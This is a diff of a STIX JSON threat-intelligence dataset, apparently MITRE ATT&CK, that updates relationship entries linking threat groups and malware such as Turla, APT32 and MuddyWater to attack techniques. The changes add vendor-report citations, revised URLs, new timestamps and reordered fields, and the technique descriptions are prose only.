"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -90007,16 +91175,21 @@
"source_name": "Kaspersky Turla"
},
{
- "description": "Faou, M. and Dumont R.. (2019, May 29). A dive into Turla PowerShell usage. Retrieved June 14, 2019.",
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
+ },
+ {
+ "source_name": "ESET Turla PowerShell May 2019",
"url": "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/",
- "source_name": "ESET Turla PowerShell May 2019"
+ "description": "Faou, M. and Dumont R.. (2019, May 29). A dive into Turla PowerShell usage. Retrieved June 14, 2019."
}
],
"source_ref": "intrusion-set--7a19ecb1-3c65-4de3-a230-993516aed6a6",
"relationship_type": "uses",
"target_ref": "attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475",
"type": "relationship",
- "modified": "2019-07-14T21:04:44.961Z",
+ "modified": "2020-06-29T02:52:31.770Z",
"created": "2017-05-31T21:33:27.045Z"
},
{
@@ -90615,12 +91788,12 @@
"url": "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-F.pdf"
}
],
- "source_ref": "malware--bd0536d7-b081-43ae-a773-cfb057c5b988",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-10-17T00:14:20.652Z"
+ "created": "2018-10-17T00:14:20.652Z",
+ "source_ref": "malware--bd0536d7-b081-43ae-a773-cfb057c5b988",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -90858,27 +92031,6 @@
"modified": "2020-03-20T16:06:56.321Z",
"created": "2019-01-30T15:47:41.349Z"
},
- {
- "id": "relationship--a381abec-332f-4b93-9585-875561eb52c1",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Magic Hound](https://attack.mitre.org/groups/G0059) has attempted to get users to execute malware via social media and spearphishing emails.(Citation: SecureWorks Mia Ash July 2017)",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "external_references": [
- {
- "source_name": "SecureWorks Mia Ash July 2017",
- "description": "Counter Threat Unit Research Team. (2017, July 27). The Curious Case of Mia Ash: Fake Persona Lures Middle Eastern Targets. Retrieved February 26, 2018.",
- "url": "https://www.secureworks.com/research/the-curious-case-of-mia-ash"
- }
- ],
- "source_ref": "intrusion-set--f9d6633a-55e6-4adc-9263-6ae080421a13",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--8c32eb4d-805f-4fc5-bf60-c4d476c131b5",
- "type": "relationship",
- "modified": "2019-09-09T19:21:42.445Z",
- "created": "2018-04-18T17:59:24.739Z"
- },
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -90958,13 +92110,13 @@
"source_name": "ClearSky MuddyWater Nov 2018"
}
],
- "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) has used a custom tool for creating reverse shells.(Citation: Symantec MuddyWater Dec 2018) [MuddyWater](https://attack.mitre.org/groups/G0069) has used JavaScript files to execute its [POWERSTATS](https://attack.mitre.org/software/S0223) payload.(Citation: FireEye MuddyWater Mar 2018)(Citation: MuddyWater TrendMicro June 2018)(Citation: Securelist MuddyWater Oct 2018)[(Citation: Symantec MuddyWater Dec 2018)(Citation: ClearSky MuddyWater Nov 2018)",
+ "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) has used a custom tool for creating reverse shells.(Citation: Symantec MuddyWater Dec 2018) [MuddyWater](https://attack.mitre.org/groups/G0069) has used JavaScript files to execute its [POWERSTATS](https://attack.mitre.org/software/S0223) payload.(Citation: FireEye MuddyWater Mar 2018)(Citation: MuddyWater TrendMicro June 2018)(Citation: Securelist MuddyWater Oct 2018)(Citation: Symantec MuddyWater Dec 2018)(Citation: ClearSky MuddyWater Nov 2018)",
"id": "relationship--3ab6b7bc-bb49-4fcd-83fc-abbec5912d41",
"source_ref": "intrusion-set--269e8108-68c6-4f99-b911-14b2e765dec2",
"relationship_type": "uses",
"target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
"type": "relationship",
- "modified": "2020-03-20T02:35:58.078Z",
+ "modified": "2020-05-29T01:24:37.175Z",
"created": "2019-01-30T17:33:40.960Z"
},
{
@@ -91198,32 +92350,6 @@
"modified": "2020-03-20T17:43:32.421Z",
"created": "2019-01-29T18:55:20.843Z"
},
- {
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "external_references": [
- {
- "description": "Dahan, A. (2017, May 24). OPERATION COBALT KITTY: A LARGE-SCALE APT IN ASIA CARRIED OUT BY THE OCEANLOTUS GROUP. Retrieved November 5, 2018.",
- "url": "https://www.cybereason.com/blog/operation-cobalt-kitty-apt",
- "source_name": "Cybereason Oceanlotus May 2017"
- },
- {
- "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
- "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
- "source_name": "Cybereason Cobalt Kitty 2017"
- }
- ],
- "description": "[APT32](https://attack.mitre.org/groups/G0050) has used port 80 for C2 communications.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)",
- "id": "relationship--c70a03fe-b06f-41b5-bd0c-a7c4d0b1c31e",
- "source_ref": "intrusion-set--247cb30b-955f-42eb-97a5-a89fef69341e",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
- "type": "relationship",
- "modified": "2019-07-17T13:11:38.033Z",
- "created": "2019-01-31T01:07:58.727Z"
- },
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -91426,14 +92552,14 @@
{
"source_name": "Kaspersky Regin",
"description": "Kaspersky Lab's Global Research and Analysis Team. (2014, November 24). THE REGIN PLATFORM NATION-STATE OWNAGE OF GSM NETWORKS. Retrieved December 1, 2014.",
- "url": "https://securelist.com/files/2014/11/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf"
+ "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070305/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf"
}
],
"source_ref": "malware--4c59cce8-cb48-4141-b9f1-f646edfaadb0",
"relationship_type": "uses",
"target_ref": "attack-pattern--c21d5a77-d422-4a69-acd7-2c53c1faa34b",
"type": "relationship",
- "modified": "2020-03-16T17:37:15.771Z",
+ "modified": "2020-06-29T01:54:53.449Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -91585,15 +92711,15 @@
{
"id": "relationship--43809fa9-dbe2-4429-875e-f0828563d6aa",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[APT32](https://attack.mitre.org/groups/G0050) has collected the OS version and computer name from victims. One of the group's backdoors can also query the Windows Registry to gather system information, and another macOS backdoor performs a fingerprint of the machine on its first connection to the C&C server.(Citation: ESET OceanLotus)(Citation: ESET OceanLotus Mar 2019)(Citation: ESET OceanLotus macOS April 2019)",
+ "description": "[APT32](https://attack.mitre.org/groups/G0050) has collected the OS version and computer name from victims. One of the group's backdoors can also query the Windows Registry to gather system information, and another macOS backdoor performs a fingerprint of the machine on its first connection to the C&C server. [APT32](https://attack.mitre.org/groups/G0050) executed shellcode to identify the name of the infected host.(Citation: ESET OceanLotus)(Citation: ESET OceanLotus Mar 2019)(Citation: ESET OceanLotus macOS April 2019)(Citation: FireEye APT32 April 2020)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "url": "https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/",
+ "source_name": "ESET OceanLotus",
"description": "Folt\u00fdn, T. (2018, March 13). OceanLotus ships new backdoor using old tricks. Retrieved May 22, 2018.",
- "source_name": "ESET OceanLotus"
+ "url": "https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/"
},
{
"description": "Dumont, R. (2019, March 20). Fake or Fake: Keeping up with OceanLotus decoys. Retrieved April 1, 2019.",
@@ -91604,13 +92730,18 @@
"source_name": "ESET OceanLotus macOS April 2019",
"url": "https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/",
"description": "Dumont, R.. (2019, April 9). OceanLotus: macOS malware update. Retrieved April 15, 2019."
+ },
+ {
+ "source_name": "FireEye APT32 April 2020",
+ "url": "https://www.fireeye.com/blog/threat-research/2020/04/apt32-targeting-chinese-government-in-covid-19-related-espionage.html",
+ "description": "Henderson, S., et al. (2020, April 22). Vietnamese Threat Actors APT32 Targeting Wuhan Government and Chinese Ministry of Emergency Management in Latest Example of COVID-19 Related Espionage. Retrieved April 28, 2020."
}
],
"source_ref": "intrusion-set--247cb30b-955f-42eb-97a5-a89fef69341e",
"relationship_type": "uses",
"target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
"type": "relationship",
- "modified": "2019-07-17T13:11:38.190Z",
+ "modified": "2020-06-19T20:04:12.572Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -91645,14 +92776,14 @@
{
"source_name": "Kaspersky Regin",
"description": "Kaspersky Lab's Global Research and Analysis Team. (2014, November 24). THE REGIN PLATFORM NATION-STATE OWNAGE OF GSM NETWORKS. Retrieved December 1, 2014.",
- "url": "https://securelist.com/files/2014/11/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf"
+ "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070305/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf"
}
],
"source_ref": "malware--4c59cce8-cb48-4141-b9f1-f646edfaadb0",
"relationship_type": "uses",
"target_ref": "attack-pattern--4f9ca633-15c5-463c-9724-bdcd54fde541",
"type": "relationship",
- "modified": "2020-03-16T17:37:15.779Z",
+ "modified": "2020-06-29T01:54:53.447Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -91690,12 +92821,12 @@
"url": "https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender_In-depth_analysis_of_APT28%E2%80%93The_Political_Cyber-Espionage.pdf"
}
],
- "source_ref": "malware--fb575479-14ef-41e9-bfab-0b7cf10bec73",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-01-16T16:13:52.465Z"
+ "created": "2018-01-16T16:13:52.465Z",
+ "source_ref": "malware--fb575479-14ef-41e9-bfab-0b7cf10bec73",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -92150,7 +93281,7 @@
{
"id": "relationship--536ed2f4-46c5-4485-998c-60f0480d5c21",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[ROKRAT](https://attack.mitre.org/software/S0240) lists the current running processes on the system.(Citation: Talos ROKRAT)",
+ "description": "[ROKRAT](https://attack.mitre.org/software/S0240) lists the current running processes on the system.(Citation: Talos ROKRAT)(Citation: NCCGroup RokRat Nov 2018)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -92159,13 +93290,18 @@
"url": "https://blog.talosintelligence.com/2017/04/introducing-rokrat.html",
"description": "Mercer, W., Rascagneres, P. (2017, April 03). Introducing ROKRAT. Retrieved May 21, 2018.",
"source_name": "Talos ROKRAT"
+ },
+ {
+ "source_name": "NCCGroup RokRat Nov 2018",
+ "url": "https://www.nccgroup.com/uk/about-us/newsroom-and-events/blogs/2018/november/rokrat-analysis/",
+ "description": "Pantazopoulos, N.. (2018, November 8). RokRat Analysis. Retrieved May 21, 2020."
}
],
"source_ref": "malware--60a9c2f0-b7a5-4e8e-959c-e1a3ff314a5f",
"relationship_type": "uses",
"target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
"type": "relationship",
- "modified": "2019-07-26T22:56:58.492Z",
+ "modified": "2020-05-21T17:07:02.767Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -92498,16 +93634,16 @@
],
"external_references": [
{
- "source_name": "ESET RTM Feb 2017",
- "description": "Faou, M. and Boutin, J.. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
- "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf"
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
}
],
"source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
"relationship_type": "uses",
"target_ref": "attack-pattern--f3c544dc-673c-4ef3-accb-53229f1ae077",
"type": "relationship",
- "modified": "2020-03-16T17:46:57.055Z",
+ "modified": "2020-05-12T22:13:17.028Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -92559,12 +93695,12 @@
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "source_ref": "tool--c11ac61d-50f4-444f-85d8-6f006067f0de",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "tool--c11ac61d-50f4-444f-85d8-6f006067f0de",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0"
},
{
"id": "relationship--ab687dca-2741-4920-a71e-e0e0444809c5",
@@ -92627,12 +93763,12 @@
"url": "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf"
}
],
- "source_ref": "malware--211cfe9f-2676-4e1c-a5f5-2c8091da2a68",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "malware--211cfe9f-2676-4e1c-a5f5-2c8091da2a68",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1"
},
{
"id": "relationship--c935fb02-a2a4-448e-adc0-2b220fc8d521",
@@ -93042,15 +94178,20 @@
"source_name": "Securelist Denis April 2017",
"url": "https://securelist.com/use-of-dns-tunneling-for-cc-communications/78203/",
"description": "Shulmin, A., Yunakovsky, S. (2017, April 28). Use of DNS Tunneling for C&C Communications. Retrieved November 5, 2018."
+ },
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
}
],
- "description": "[Denis](https://attack.mitre.org/software/S0354) collects the username from the victim\u2019s machine.(Citation: Securelist Denis April 2017)",
+ "description": "[Denis](https://attack.mitre.org/software/S0354) enumerates and collects the username from the victim\u2019s machine.(Citation: Securelist Denis April 2017)(Citation: Cybereason Cobalt Kitty 2017)",
"id": "relationship--b47d8f5e-7c09-4f40-a5a8-ccce10a8363b",
"source_ref": "malware--f25aab1a-0cef-4910-a85d-bb38b32ea41a",
"relationship_type": "uses",
"target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104",
"type": "relationship",
- "modified": "2019-04-24T20:56:04.677Z",
+ "modified": "2020-06-19T20:39:21.911Z",
"created": "2019-01-30T20:01:45.535Z"
},
{
@@ -93088,12 +94229,12 @@
"url": "https://technet.microsoft.com/en-us/library/bb491010.aspx"
}
],
- "source_ref": "tool--2e45723a-31da-4a7e-aaa6-e01998a6788f",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "tool--2e45723a-31da-4a7e-aaa6-e01998a6788f",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -93518,12 +94659,12 @@
"url": "http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/"
}
],
- "source_ref": "malware--463f68f1-5cde-4dc2-a831-68b73488f8f4",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--463f68f1-5cde-4dc2-a831-68b73488f8f4",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -93965,25 +95106,15 @@
"description": "Lee, B. and Falcone, R. (2017, February 15). Magic Hound Campaign Attacks Saudi Targets. Retrieved December 27, 2017.",
"url": "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/"
},
- {
- "source_name": "Secureworks Cobalt Gypsy Feb 2017",
- "description": "Counter Threat Unit Research Team. (2017, February 15). Iranian PupyRAT Bites Middle Eastern Organizations. Retrieved December 27, 2017.",
- "url": "https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations"
- },
- {
- "source_name": "SecureWorks Mia Ash July 2017",
- "description": "Counter Threat Unit Research Team. (2017, July 27). The Curious Case of Mia Ash: Fake Persona Lures Middle Eastern Targets. Retrieved February 26, 2018.",
- "url": "https://www.secureworks.com/research/the-curious-case-of-mia-ash"
- },
{
"source_name": "FireEye APT35 2018",
"description": "Mandiant. (2018). Mandiant M-Trends 2018. Retrieved July 9, 2018.",
"url": "https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf"
}
],
- "description": "(Citation: Unit 42 Magic Hound Feb 2017)(Citation: Secureworks Cobalt Gypsy Feb 2017)(Citation: SecureWorks Mia Ash July 2017)(Citation: FireEye APT35 2018)",
+ "description": "(Citation: Unit 42 Magic Hound Feb 2017)(Citation: FireEye APT35 2018)",
"type": "relationship",
- "modified": "2019-09-09T19:21:42.601Z",
+ "modified": "2020-05-27T21:46:31.627Z",
"created": "2018-04-18T17:59:24.739Z"
},
{
@@ -94021,17 +95152,17 @@
"url": "https://netzpolitik.org/2015/digital-attack-on-german-parliament-investigative-report-on-the-hack-of-the-left-party-infrastructure-in-bundestag/"
}
],
- "source_ref": "tool--90ec2b22-7061-4469-b539-0989ec4f96c2",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "tool--90ec2b22-7061-4469-b539-0989ec4f96c2",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18"
},
{
"id": "relationship--7d115073-c008-4394-867d-07c385d3db87",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Cobalt Group](https://attack.mitre.org/groups/G0080) has sent Word OLE compound documents with malicious obfuscated VBA macros that will run upon user execution and executed JavaScript scriptlets on the victim's machine.(Citation: Talos Cobalt Group July 2018)(Citation: PTSecurity Cobalt Group Aug 2017)(Citation: Group IB Cobalt Aug 2017)(Citation: Morphisec Cobalt Gang Oct 2018)(Citation: Unit 42 Cobalt Gang Oct 2018)(Citation: TrendMicro Cobalt Group Nov 2017)",
+ "description": "[Cobalt Group](https://attack.mitre.org/groups/G0080) has sent Word OLE compound documents with malicious obfuscated VBA macros that will run upon user execution.(Citation: Talos Cobalt Group July 2018)(Citation: PTSecurity Cobalt Group Aug 2017)(Citation: Group IB Cobalt Aug 2017)(Citation: Morphisec Cobalt Gang Oct 2018)(Citation: Unit 42 Cobalt Gang Oct 2018)(Citation: TrendMicro Cobalt Group Nov 2017)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -94069,9 +95200,9 @@
],
"source_ref": "intrusion-set--dc6fe6ee-04c2-49be-ba3d-f38d2463c02a",
"relationship_type": "uses",
- "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
+ "target_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
"type": "relationship",
- "modified": "2020-03-20T15:40:43.307Z",
+ "modified": "2020-06-23T19:41:51.997Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -94283,15 +95414,25 @@
"source_name": "CitizenLab Tropic Trooper Aug 2018",
"url": "https://citizenlab.ca/2018/08/familiar-feeling-a-malware-campaign-targeting-the-tibetan-diaspora-resurfaces/",
"description": "Alexander, G., et al. (2018, August 8). Familiar Feeling: A Malware Campaign Targeting the Tibetan Diaspora Resurfaces. Retrieved June 17, 2019."
+ },
+ {
+ "source_name": "Anomali Pirate Panda April 2020",
+ "url": "https://www.anomali.com/blog/anomali-suspects-that-china-backed-apt-pirate-panda-may-be-seeking-access-to-vietnam-government-data-center#When:15:00:00Z",
+ "description": "Moore, S. et al. (2020, April 30). Anomali Suspects that China-Backed APT Pirate Panda May Be Seeking Access to Vietnam Government Data Center. Retrieved May 19, 2020."
+ },
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
}
],
- "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) sent spearphishing emails that contained malicious Microsoft Office attachments.(Citation: Unit 42 Tropic Trooper Nov 2016)(Citation: TrendMicro TropicTrooper 2015)(Citation: CitizenLab Tropic Trooper Aug 2018)",
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) sent spearphishing emails that contained malicious Microsoft Office and fake installer file attachments.(Citation: Unit 42 Tropic Trooper Nov 2016)(Citation: TrendMicro TropicTrooper 2015)(Citation: CitizenLab Tropic Trooper Aug 2018)(Citation: Anomali Pirate Panda April 2020)(Citation: TrendMicro Tropic Trooper May 2020)",
"id": "relationship--0be962d8-6281-4554-ad1f-4cba04c547de",
"source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
"relationship_type": "uses",
"target_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597",
"type": "relationship",
- "modified": "2019-06-30T22:44:28.214Z",
+ "modified": "2020-05-21T12:59:00.645Z",
"created": "2019-01-29T20:17:49.311Z"
},
{
@@ -94308,12 +95449,12 @@
"url": "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html"
}
],
- "source_ref": "malware--0ced8926-914e-4c78-bc93-356fb90dbd1f",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--0ced8926-914e-4c78-bc93-356fb90dbd1f",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580"
},
{
"id": "relationship--e2e35a7a-3057-4955-9e7e-c3972e0ad423",
@@ -94871,13 +96012,13 @@
"description": "The DigiTrust Group. (2017, January 12). The Rise of Agent Tesla. Retrieved November 5, 2018."
}
],
- "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) collects account information from the victim\u2019s machine.(Citation: DigiTrust Agent Tesla Jan 2017)",
+ "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) can collect account information from the victim\u2019s machine.(Citation: DigiTrust Agent Tesla Jan 2017)",
"id": "relationship--0d93e75b-e13d-4bd5-97d2-b4f8d05e9efd",
"source_ref": "malware--e7a5229f-05eb-440e-b982-9a6d2b2b87c8",
"relationship_type": "uses",
"target_ref": "attack-pattern--25659dd6-ea12-45c4-97e6-381e3e4b593e",
"type": "relationship",
- "modified": "2020-03-18T19:25:30.247Z",
+ "modified": "2020-05-28T23:41:03.886Z",
"created": "2019-01-29T18:44:05.065Z"
},
{
@@ -95039,23 +96180,28 @@
],
"external_references": [
{
- "source_name": "Cybereason Oceanlotus May 2017",
+ "description": "Dahan, A. (2017, May 24). OPERATION COBALT KITTY: A LARGE-SCALE APT IN ASIA CARRIED OUT BY THE OCEANLOTUS GROUP. Retrieved November 5, 2018.",
"url": "https://www.cybereason.com/blog/operation-cobalt-kitty-apt",
- "description": "Dahan, A. (2017, May 24). OPERATION COBALT KITTY: A LARGE-SCALE APT IN ASIA CARRIED OUT BY THE OCEANLOTUS GROUP. Retrieved November 5, 2018."
+ "source_name": "Cybereason Oceanlotus May 2017"
},
{
"source_name": "Securelist Denis April 2017",
"url": "https://securelist.com/use-of-dns-tunneling-for-cc-communications/78203/",
"description": "Shulmin, A., Yunakovsky, S. (2017, April 28). Use of DNS Tunneling for C&C Communications. Retrieved November 5, 2018."
+ },
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
}
],
- "description": "[Denis](https://attack.mitre.org/software/S0354) has used DNS tunneling for C2 communications.(Citation: Cybereason Oceanlotus May 2017)(Citation: Securelist Denis April 2017)",
+ "description": "[Denis](https://attack.mitre.org/software/S0354) has used DNS tunneling for C2 communications.(Citation: Cybereason Oceanlotus May 2017)(Citation: Securelist Denis April 2017)(Citation: Cybereason Cobalt Kitty 2017)",
"id": "relationship--01eb6d18-bb7b-4e4a-b133-60407f40773b",
"source_ref": "malware--f25aab1a-0cef-4910-a85d-bb38b32ea41a",
"relationship_type": "uses",
"target_ref": "attack-pattern--1996eef1-ced3-4d7f-bf94-33298cabbf72",
"type": "relationship",
- "modified": "2020-03-17T00:54:31.427Z",
+ "modified": "2020-06-19T20:39:21.916Z",
"created": "2019-01-30T20:01:45.452Z"
},
{
@@ -95355,12 +96501,12 @@
],
"description": "[AuditCred](https://attack.mitre.org/software/S0347) has used Port Number 443 for C2 communications.(Citation: TrendMicro Lazarus Nov 2018)",
"id": "relationship--894666a8-f37a-4c72-a61e-c130bc6ac197",
- "source_ref": "malware--24b4ce59-eaac-4c8b-8634-9b093b7ccd92",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
"type": "relationship",
"modified": "2019-01-30T15:47:41.383Z",
- "created": "2019-01-30T15:47:41.383Z"
+ "created": "2019-01-30T15:47:41.383Z",
+ "source_ref": "malware--24b4ce59-eaac-4c8b-8634-9b093b7ccd92",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -95395,18 +96541,23 @@
"source_name": "Securelist MuddyWater Oct 2018"
},
{
- "source_name": "ClearSky MuddyWater Nov 2018",
+ "description": "ClearSky Cyber Security. (2018, November). MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign. Retrieved November 29, 2018.",
"url": "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf",
- "description": "ClearSky Cyber Security. (2018, November). MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign. Retrieved November 29, 2018."
+ "source_name": "ClearSky MuddyWater Nov 2018"
+ },
+ {
+ "source_name": "Reaqta MuddyWater November 2017",
+ "url": "https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/",
+ "description": "Reaqta. (2017, November 22). A dive into MuddyWater APT targeting Middle-East. Retrieved May 18, 2020."
}
],
- "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) has used malware that can upload additional files to the victim\u2019s machine.(Citation: Securelist MuddyWater Oct 2018)(Citation: ClearSky MuddyWater Nov 2018)",
